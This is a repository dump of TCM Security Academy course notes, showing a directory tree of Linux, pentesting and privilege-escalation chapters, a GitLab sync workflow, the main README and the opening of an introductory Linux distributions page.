├── .gitbook └── assets │ └── tcmsecuritycovermid.png ├── .github └── workflows │ └── sync-to-gitlab.yml ├── LICENSE ├── README.md ├── SUMMARY.md ├── linux-101 ├── .gitbook │ └── assets │ │ └── linux101.png ├── 1-linux-distributions │ ├── .gitbook │ │ └── assets │ │ │ ├── image-20220724200352501.png │ │ │ ├── image-20220814155217998.png │ │ │ ├── image-20220814155334144.png │ │ │ ├── image-20220814160023790.png │ │ │ ├── image-20220814162743473.png │ │ │ ├── image-20220814163415069.png │ │ │ ├── image-20220814164656943.png │ │ │ ├── image-20220814165535424.png │ │ │ ├── image-20220814165746274.png │ │ │ ├── image-20220814170229539.png │ │ │ ├── image-20220814171524228.png │ │ │ ├── image-20220814171602035.png │ │ │ ├── image-20220814172526947.png │ │ │ ├── image-20220814172653457.png │ │ │ ├── image-20220814173136821.png │ │ │ ├── image-20220814174135011.png │ │ │ ├── image-20220814174252593.png │ │ │ ├── image-20220814174901665.png │ │ │ ├── image-20220814174955219.png │ │ │ ├── image-20220814175137011.png │ │ │ ├── image-20220814175228447.png │ │ │ ├── image-20220814180203046.png │ │ │ ├── image-20220814180915886.png │ │ │ ├── image-20220814181134051.png │ │ │ ├── image-20220814181633168.png │ │ │ ├── image-20220814181848186.png │ │ │ └── image-20220814182124471.png │ ├── README.md │ ├── installing-linux.md │ └── linux-distributions.md ├── 10-scripting │ ├── .gitbook │ │ └── assets │ │ │ └── password_strength.png │ ├── README.md │ └── bash-script.md ├── 2-command-line │ ├── .gitbook │ │ └── assets │ │ │ └── image-20220828150837433.png │ ├── README.md │ ├── arguments-options.md │ ├── getting-help.md │ ├── intro-to-commandline.md │ └── read-textfiles.md ├── 3-filesystem │ ├── .gitbook │ │ └── assets │ │ │ ├── fhs2.png │ │ │ ├── image-20220828172429787.png │ │ │ ├── image-20220828172735170.png │ │ │ └── image-20220828173252814.png │ ├── README.md │ ├── archive-files.md │ ├── devices.md │ ├── files-dirs.md │ ├── fs-hierarchy.md │ ├── fs-links.md │ ├── path-filenames.md │ └── paths.md ├── 4-users-groups │ ├── README.md │ ├── permissions.md │ ├── users-credentials.md │ └── users-groups.md ├── 5-installing-sw │ ├── .gitbook │ │ └── assets │ │ │ └── image-20221009142845749.png │ ├── README.md │ └── package-management.md ├── 6-shells │ ├── .gitbook │ │ └── assets │ │ │ ├── image-20221010190521527.png │ │ │ ├── image-20221010191004310.png │ │ │ └── image-20221010203032874.png │ ├── README.md │ ├── env-vars-files.md │ ├── history-sub.md │ ├── io-redir.md │ └── shells.md ├── 7-utilities-editors │ ├── .gitbook │ │ └── assets │ │ │ ├── image-20221025192700216.png │ │ │ ├── image-20221025192951741.png │ │ │ ├── image-20221025193403042.png │ │ │ ├── image-20221025193506230.png │ │ │ ├── image-20221025193838088.png │ │ │ ├── image-20221025222819962.png │ │ │ ├── image-20221025223714564.png │ │ │ ├── image-20221025223944428.png │ │ │ ├── image-20221025231808258.png │ │ │ ├── image-20221025234041680.png │ │ │ ├── image-20221025234247348.png │ │ │ ├── image-20221026214813235.png │ │ │ ├── image-20221026220434443.png │ │ │ └── image-20221026221343563.png │ ├── README.md │ ├── files-transfer.md │ ├── net-cmd.md │ ├── text-edit.md │ └── text-manip.md ├── 8-process-manag │ ├── .gitbook │ │ └── assets │ │ │ ├── image-20221029114008847.png │ │ │ ├── image-20221029115152902.png │ │ │ ├── image-20221029115331049.png │ │ │ ├── image-20221029120001281.png │ │ │ ├── image-20221029120425744.png │ │ │ └── image-20221105091330993.png │ ├── README.md │ ├── process-fg-bg.md │ ├── process-info.md │ ├── process-manage.md │ └── process-sched.md ├── 9-regex │ ├── .gitbook │ │ └── assets │ │ │ ├── image-20221106121128550.png │ │ │ ├── image-20221106122654661.png │ │ │ ├── image-20221106123143626.png │ │ │ ├── image-20221106123519496.png │ │ │ ├── image-20221106134143911.png │ │ │ ├── image-20221106134636112.png │ │ │ └── image-20221106135932189.png │ ├── README.md │ └── regex-use.md ├── README.md └── linux101-references.md ├── lpe └── README.md ├── mapt ├── .gitbook │ └── assets │ │ └── mapt.png ├── 1-intro │ ├── .gitbook │ │ └── assets │ │ │ └── 2023-12-24_10-00-26_279.png │ └── README.md ├── 10-ios-dynamic │ ├── .gitbook │ │ └── assets │ │ │ └── 2024-02-25_02-08-07_429.png │ └── README.md ├── 11-ios-bonus │ └── README.md ├── 2-android │ ├── .gitbook │ │ └── assets │ │ │ ├── 1-pYeENzIsobLH6nfRCK9SA.png │ │ │ ├── 2024-01-05_12-54-58_283.png │ │ │ ├── 2024-01-05_12-55-28_284.png │ │ │ ├── Android-logo.png │ │ │ ├── android-software-stack.png │ │ │ └── image-20240105151318551.png │ └── README.md ├── 3-android-lab │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-01-05_15-35-46_285.png │ │ │ ├── 2024-01-05_15-38-29_286.png │ │ │ ├── 2024-01-05_15-45-03_287.png │ │ │ ├── 2024-01-05_15-46-13_288.png │ │ │ └── 2024-01-05_16-38-30_289.png │ └── README.md ├── 4-android-static │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-01-05_19-44-52_291.png │ │ │ ├── 2024-01-05_20-20-52_292.png │ │ │ ├── 2024-01-05_20-24-11_293.png │ │ │ ├── 2024-01-06_11-24-45_295.png │ │ │ ├── 2024-01-06_11-36-39_296.png │ │ │ ├── 2024-01-06_11-45-43_297.png │ │ │ ├── 2024-01-06_12-03-09_299.png │ │ │ ├── 2024-01-06_12-08-00_300.png │ │ │ ├── 2024-01-06_12-10-03_301.png │ │ │ ├── 2024-01-06_12-13-32_302.png │ │ │ ├── 2024-01-06_12-25-25_303.png │ │ │ ├── 2024-01-06_12-49-23_304.png │ │ │ ├── 2024-01-06_13-11-56_305.png │ │ │ ├── 2024-01-06_13-12-40_306.png │ │ │ ├── 2024-01-06_13-14-56_307.png │ │ │ ├── 2024-01-06_13-17-35_308.png │ │ │ ├── 2024-01-06_14-37-31_311.png │ │ │ ├── 2024-01-06_14-38-13_312.png │ │ │ ├── 2024-01-06_14-38-34_313.png │ │ │ ├── 2024-01-06_14-39-52_314.png │ │ │ ├── 2024-01-06_14-40-58_315.png │ │ │ ├── 2024-01-06_14-41-44_316.png │ │ │ ├── 2024-01-06_14-42-41_317.png │ │ │ ├── 2024-01-06_14-47-50_318.png │ │ │ ├── 2024-01-06_14-49-11_319.png │ │ │ ├── 2024-01-06_14-50-11_320.png │ │ │ └── 2024-01-06_14-53-44_321.png │ └── README.md ├── 5-android-dynamic │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-01-06_23-41-17_322.png │ │ │ ├── 2024-01-07_00-29-51_326.png │ │ │ ├── 2024-01-07_00-35-16_327.png │ │ │ ├── 2024-01-07_00-36-01_328.png │ │ │ ├── 2024-01-07_00-37-05_329.png │ │ │ ├── 2024-01-07_00-44-49_330.png │ │ │ ├── 2024-01-07_00-45-49_331.png │ │ │ ├── 2024-01-07_00-47-13_332.png │ │ │ ├── 2024-01-07_00-55-56_333.png │ │ │ ├── 2024-01-07_00-57-23_334.png │ │ │ ├── 2024-01-07_01-02-01_335.png │ │ │ ├── 2024-01-07_01-13-11_337.png │ │ │ ├── 2024-01-07_01-30-15_338.png │ │ │ ├── 2024-01-07_01-32-52_339.png │ │ │ ├── 2024-01-07_01-36-41_340.png │ │ │ ├── 2024-01-07_01-43-18_342.png │ │ │ ├── 2024-01-07_01-45-17_343.png │ │ │ ├── 2024-01-07_03-12-28_345.png │ │ │ ├── 2024-01-07_09-08-37_347.png │ │ │ ├── 2024-01-07_09-25-53_348.png │ │ │ ├── 2024-01-07_09-33-12_349.png │ │ │ └── 2024-01-07_10-16-09_350.png │ └── README.md ├── 6-android-bonus │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-01-09_23-34-21_351.png │ │ │ ├── 2024-01-09_23-37-42_352.png │ │ │ ├── 2024-01-10_00-13-00_353.png │ │ │ ├── 2024-01-10_00-15-33_354.png │ │ │ ├── 2024-01-10_00-16-25_355.png │ │ │ ├── 2024-01-10_00-23-55_356.png │ │ │ ├── 2024-01-10_00-26-33_357.png │ │ │ ├── 2024-01-10_00-27-23_358.png │ │ │ ├── 2024-01-10_00-30-43_359.png │ │ │ ├── 2024-01-10_00-32-39_360.png │ │ │ ├── 2024-01-10_00-35-15_361.png │ │ │ ├── 2024-01-10_00-38-03_362.png │ │ │ ├── 2024-01-10_00-39-25_363.png │ │ │ ├── 2024-01-21_12-46-46_371.png │ │ │ └── 2024-01-21_13-13-40_372.png │ └── README.md ├── 7-ios │ ├── .gitbook │ │ └── assets │ │ │ ├── ios-logo.png │ │ │ └── ios-sec-architecture.png │ └── README.md ├── 8-ios-lab │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-02-24_20-00-26_419.png │ │ │ └── 2024-02-24_20-12-01_420.png │ └── README.md ├── 9-ios-static │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-02-25_00-38-23_421.png │ │ │ ├── 2024-02-25_00-47-43_422.png │ │ │ ├── 2024-02-25_00-48-49_423.png │ │ │ ├── 2024-02-25_01-25-16_424.png │ │ │ ├── 2024-02-25_01-28-44_425.png │ │ │ ├── 2024-02-25_01-29-28_426.png │ │ │ ├── 2024-02-25_01-31-45_427.png │ │ │ └── 2024-02-25_01-36-57_428.png │ └── README.md ├── README.md └── mapt-references.md ├── peh ├── .gitbook │ └── assets │ │ └── peh.png ├── 1-intro │ ├── .gitbook │ │ └── assets │ │ │ ├── 2023-06-13_13-16-35_56.png │ │ │ ├── LayersofOSI1.png │ │ │ ├── original-seven-layers-of-osi-model.png │ │ │ └── osi-attacks.png │ └── README.md ├── 2-lab │ ├── .gitbook │ │ └── assets │ │ │ ├── 2023-06-13_15-31-52_57.png │ │ │ ├── 2023-06-13_15-34-48_58.png │ │ │ ├── 2023-06-13_16-12-41_60.png │ │ │ ├── 2023-06-13_16-13-44_61.png │ │ │ ├── 2023-06-13_16-18-52_62.png │ │ │ ├── 2023-06-13_16-29-12_63.png │ │ │ ├── 2023-06-13_16-31-48_64.png │ │ │ ├── 2023-06-13_16-45-36_65.png │ │ │ ├── 2023-06-20_13-53-15_93.png │ │ │ ├── 2023-06-20_15-43-49_94.png │ │ │ ├── 2023-06-27_19-33-02_117.png │ │ │ ├── 2023-06-27_20-09-27_118.png │ │ │ ├── 2023-06-27_20-37-26_121.png │ │ │ ├── 2023-06-28_00-16-16_122.png │ │ │ ├── 2023-06-28_00-17-23_123.png │ │ │ ├── 2023-07-01_19-37-07_128.png │ │ │ ├── 2023-07-01_20-20-58_129.png │ │ │ ├── 2023-07-01_20-38-59_131.png │ │ │ ├── 2023-07-03_10-54-56_141.png │ │ │ ├── 2023-07-03_10-55-13_142.png │ │ │ ├── 2023-07-03_11-25-49_144.png │ │ │ ├── 2023-07-03_11-35-32_145.png │ │ │ ├── 2023-07-04_17-08-01_151.png │ │ │ ├── 2023-07-04_17-14-16_152.png │ │ │ ├── 2024-06-29_15-22-24_524.png │ │ │ ├── 2024-06-29_15-49-25_525.png │ │ │ ├── 2024-06-29_16-20-39_526.png │ │ │ ├── 2024-06-29_16-24-10_527.png │ │ │ ├── 2024-06-29_16-27-44_528.png │ │ │ ├── 2024-06-29_17-45-17_530.png │ │ │ ├── kali.svg │ │ │ └── python.svg │ ├── README.md │ ├── kali-linux.md │ └── python.md ├── 3-eth-hack │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-07-02_20-03-06_537.png │ │ │ ├── 2024-07-02_20-30-23_539.png │ │ │ ├── 2024-07-02_23-58-39_542.png │ │ │ ├── 2024-07-03_00-09-39_543.png │ │ │ ├── 2024-07-03_00-12-42_544.png │ │ │ ├── 2024-07-03_19-54-58_561.png │ │ │ ├── 2024-07-03_20-14-16_570.png │ │ │ ├── 2024-07-03_20-17-06_571.png │ │ │ ├── 2024-07-03_20-25-14_572.png │ │ │ ├── 2024-07-03_23-06-45_573.png │ │ │ ├── 2024-07-03_23-10-03_575.png │ │ │ ├── 2024-07-07_14-34-14_581-1720355665903-3.png │ │ │ ├── 2024-07-07_14-35-03_582.png │ │ │ ├── 2024-07-07_14-38-22_583.png │ │ │ ├── 2024-07-11_08-02-01_590.png │ │ │ ├── 2024-07-11_08-06-15_591.png │ │ │ ├── 2024-07-11_08-09-04_592.png │ │ │ ├── 2024-07-11_08-11-16_593.png │ │ │ ├── 2024-07-11_08-35-23_594.png │ │ │ ├── 2024-07-11_09-10-36_595.png │ │ │ ├── 2024-07-11_20-40-27_596.png │ │ │ ├── 2024-07-11_20-41-43_597.png │ │ │ ├── 2024-07-11_20-44-16_599.png │ │ │ ├── 2024-07-11_20-44-48_600.png │ │ │ ├── 2024-07-13_09-03-53_601.png │ │ │ ├── 2024-07-13_09-10-10_602.png │ │ │ ├── 2024-07-13_09-24-35_603.png │ │ │ ├── 2024-07-13_09-53-02_604.png │ │ │ ├── 2024-07-13_10-10-23_605.png │ │ │ ├── 2024-07-13_10-10-38_606.png │ │ │ ├── 2024-07-13_10-20-20_607.png │ │ │ ├── 2024-07-13_23-40-18_609.png │ │ │ ├── 2024-07-13_23-49-55_610.png │ │ │ ├── 2024-07-13_23-52-14_611.png │ │ │ ├── 2024-07-14_11-24-27_612.png │ │ │ ├── 2024-07-14_11-42-54_613.png │ │ │ ├── 2024-07-14_11-51-24_614.png │ │ │ ├── 2024-07-14_12-01-59_615.png │ │ │ ├── 2024-07-14_12-07-27_617.png │ │ │ ├── 2024-07-14_12-14-47_620.png │ │ │ ├── 2024-07-14_12-15-03_621.png │ │ │ ├── 2024-07-14_12-35-27_623.png │ │ │ ├── 2024-07-14_12-37-24_624.png │ │ │ ├── 2024-07-14_12-48-12_626.png │ │ │ ├── 2024-07-14_18-49-15_627.png │ │ │ ├── 2024-07-14_18-55-25_628.png │ │ │ ├── 2024-07-14_19-07-03_629.png │ │ │ ├── 2024-07-14_19-16-46_630.png │ │ │ ├── 2024-07-14_19-24-12_631.png │ │ │ ├── 2024-07-14_19-29-26_632.png │ │ │ ├── 2024-07-14_19-31-18_633.png │ │ │ ├── 2024-07-14_19-38-26_634.png │ │ │ ├── 2024-07-14_19-43-46_635.png │ │ │ ├── 2024-07-14_19-53-41_637.png │ │ │ ├── Netcat-bind-shell.jpg │ │ │ ├── Netcat-reverse-shell.jpg │ │ │ └── Phases-of-Ethical-Hacking.png │ ├── README.md │ ├── capstone.md │ ├── enum.md │ ├── exploit.md │ ├── recon.md │ └── va.md ├── 4-active-directory │ ├── .gitbook │ │ └── assets │ │ │ ├── 2024-07-15_23-41-00_638.png │ │ │ ├── 2024-07-28_21-48-50_660.png │ │ │ ├── 2024-07-28_21-59-11_661.png │ │ │ ├── 2024-07-29_17-11-00_662.png │ │ │ ├── 2024-07-29_17-19-49_663.png │ │ │ ├── 2024-07-29_17-25-15_664.png │ │ │ ├── 2024-07-29_17-30-47_665.png │ │ │ ├── 2024-07-29_17-36-56_666.png │ │ │ ├── 2024-07-29_17-56-07_667.png │ │ │ ├── 2024-07-29_17-59-35_668.png │ │ │ ├── 2024-07-29_18-03-18_669.png │ │ │ ├── 2024-08-13_22-35-29_679.png │ │ │ ├── 2024-08-13_22-39-43_680.png │ │ │ ├── 2024-08-13_23-25-28_682.png │ │ │ ├── 2024-08-15_18-16-02_684.png │ │ │ ├── 2024-08-15_18-18-01_685.png │ │ │ ├── 2024-08-15_18-50-35_686.png │ │ │ ├── 2024-08-15_18-55-48_687.png │ │ │ ├── 2024-08-15_18-58-57_688.png │ │ │ ├── 2024-08-15_19-00-45_689.png │ │ │ ├── 2024-08-15_19-01-39_690.png │ │ │ ├── 2024-08-16_09-18-13_685.png │ │ │ ├── 2024-08-16_09-21-21_686.png │ │ │ ├── 2024-08-16_09-26-19_687.png │ │ │ ├── 2024-08-16_09-44-46_688.png │ │ │ ├── 2025-02-15_09-35-18_881.png │ │ │ ├── 2025-02-15_10-30-03_883.png │ │ │ ├── 2025-02-15_19-47-13_885.png │ │ │ ├── 2025-02-15_20-28-56_886.png │ │ │ ├── 2025-02-16_10-42-02_887.png │ │ │ ├── ad-org.png │ │ │ ├── ad.png │ │ │ └── llmnr-overview.png │ ├── 1-ad-lab.md │ ├── 2-ad-init-vectors.md │ ├── 3-ad-enum.md │ ├── 4-ad-attacks.md │ ├── 5-ad-adv-attacks.md │ ├── 6-ad-casestudies.md │ └── README.md ├── 5-post-exploitation │ └── README.md ├── 6-webapp │ ├── .gitbook │ │ └── assets │ │ │ ├── 2025-02-24_22-12-54_904.png │ │ │ ├── 2025-02-24_22-39-27_905.png │ │ │ ├── 2025-02-24_22-43-34_906.png │ │ │ ├── 2025-02-24_22-46-18_907.png │ │ │ ├── 2025-02-24_23-01-58_909.png │ │ │ ├── 2025-02-25_22-01-04_910.png │ │ │ ├── 2025-02-25_23-17-21_912.png │ │ │ ├── 2025-02-26_00-02-01_913.png │ │ │ ├── 2025-02-26_00-17-05_914.png │ │ │ ├── 2025-02-27_23-53-57_915.png │ │ │ ├── 2025-02-28_00-55-21_916.png │ │ │ ├── 2025-02-28_01-02-32_917.png │ │ │ ├── 2025-02-28_01-14-39_918.png │ │ │ ├── 2025-02-28_01-22-19_919.png │ │ │ ├── 2025-02-28_01-23-00_920.png │ │ │ ├── 2025-02-28_01-36-17_921.png │ │ │ ├── 2025-02-28_01-40-15_922.png │ │ │ ├── 2025-02-28_01-55-59_924.png │ │ │ ├── 2025-02-28_02-01-23_925.png │ │ │ ├── 2025-02-28_02-10-23_926.png │ │ │ ├── 2025-02-28_02-10-35_927.png │ │ │ ├── 2025-02-28_02-25-45_928.png │ │ │ ├── 2025-02-28_13-29-38_929.png │ │ │ ├── 2025-02-28_13-35-42_930.png │ │ │ └── 2025-02-28_19-27-14_931.png │ ├── 1-web-lab.md │ ├── 2-web-sqli.md │ ├── 3-web-xss.md │ ├── 4-web-cmd-injection.md │ ├── 5-web-file-upload.md │ ├── 6-web-auth-attacks.md │ ├── 7-web-xxe.md │ ├── 8-web-idor.md │ ├── 9-web-capstone-lab.md │ └── README.md ├── 7-wireless │ ├── .gitbook │ │ └── assets │ │ │ ├── 2025-02-21_08-33-58_895.png │ │ │ ├── 2025-02-21_08-39-18_896.png │ │ │ └── image-20250221082555755.png │ └── README.md ├── 8-report │ └── README.md ├── README.md └── peh-references.md └── wpe ├── .gitbook └── assets │ └── wpe.png ├── 1-intro └── README.md ├── 2-win-privesc-paths ├── 1-wpe-kernelexploits.md ├── 10-wpe-cve-2019-1388.md ├── 11-wpe-capstone.md ├── 2-wpe-pws-portfwd.md ├── 3-wpe-wsl.md ├── 4-wpe-system-runas.md ├── 5-wpe-registry.md ├── 6-wpe-exes.md ├── 7-wpe-startupapps.md ├── 8-wpe-dll-hijacking.md ├── 9-wpe-permissions.md └── README.md ├── README.md └── wpe-references.md /.gitbook/assets/tcmsecuritycovermid.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/.gitbook/assets/tcmsecuritycovermid.png -------------------------------------------------------------------------------- /.github/workflows/sync-to-gitlab.yml: -------------------------------------------------------------------------------- 1 | name: Sync Repo To Gitlab 2 | 3 | on: [push, pull_request, create, delete] 4 | 5 | jobs: 6 | sync: 7 | name: Gitlab Sync 8 | runs-on: ubuntu-latest 9 | steps: 10 | - uses: actions/checkout@v4 11 | with: 12 | fetch-depth: 0 13 | - uses: action-pack/gitlab-sync@v3 14 | with: 15 | username: ${{ secrets.TARGET_USERNAME }} 16 | url: ${{ secrets.TARGET_URL }} 17 | # Personal access token from gitlab.com 18 | token: ${{ secrets.TARGET_TOKEN }} 19 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TCM Security Academy Notes 2 | 3 | ![academy.tcm-sec.com - © TCM Security](.gitbook/assets/tcmsecuritycovermid.png) 4 | 5 | ## TCM Academy Courses - Notes 6 | 7 | - [x] [Linux 101](linux-101/README.md) by Brent Eskridge 8 | - [x] [Mobile Application Penetration Testing](mapt/README.md) by [Aaron Wilson](https://www.linkedin.com/in/wilson-security/overlay/about-this-profile/) 9 | - [x] [Practical Ethical Hacking](peh/README.md) by [Heath Adams](https://www.thecybermentor.com/) 10 | 11 | --- 12 | 13 | -------------------------------------------------------------------------------- /linux-101/.gitbook/assets/linux101.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/.gitbook/assets/linux101.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220724200352501.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220724200352501.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814155217998.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814155217998.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814155334144.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814155334144.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814160023790.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814160023790.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814162743473.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814162743473.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814163415069.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814163415069.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814164656943.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814164656943.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814165535424.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814165535424.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814165746274.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814165746274.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814170229539.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814170229539.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814171524228.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814171524228.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814171602035.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814171602035.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814172526947.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814172526947.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814172653457.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814172653457.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814173136821.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814173136821.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814174135011.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814174135011.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814174252593.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814174252593.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814174901665.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814174901665.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814174955219.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814174955219.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814175137011.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814175137011.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814175228447.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814175228447.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814180203046.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814180203046.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814180915886.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814180915886.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814181134051.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814181134051.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814181633168.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814181633168.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814181848186.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814181848186.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/.gitbook/assets/image-20220814182124471.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/syselement/tcm-sec-notes/1c6f618733e3b7a75bfb0afa9181560eb4d54aab/linux-101/1-linux-distributions/.gitbook/assets/image-20220814182124471.png -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/README.md: -------------------------------------------------------------------------------- 1 | # Introduction to Linux 2 | 3 | ### Topics 4 | 5 | - What is Linux 6 | - What is a Linux distribution 7 | - How to install Linux 8 | 9 | ### Sections 10 | 11 | 1. [Linux Distributions](linux-distributions.md) 12 | 2. [Installing Linux](installing-linux.md) 13 | -------------------------------------------------------------------------------- /linux-101/1-linux-distributions/linux-distributions.md: -------------------------------------------------------------------------------- 1 | # Linux Distributions 2 | 3 | ## What is Linux? 4 | 5 | - Linux is an open source Operating System (O.S.) 6 | - Can be downloaded for free 7 | - Wide variety of distributions 8 | - An OS manages resources such as CPU time, memory, storage space, etc. 9 | - Linux is, *at its most basic*, just the Kernel of the OS 10 | - the always running core at the lowest level of the operating system 11 | 12 | ## What is a Linux Distribution? 13 | 14 | - A **Linux *distro*** is the Linux kernel combined with all the software necessary for an OS, like: 15 | - desktop environment (GUI) 16 | - applications 17 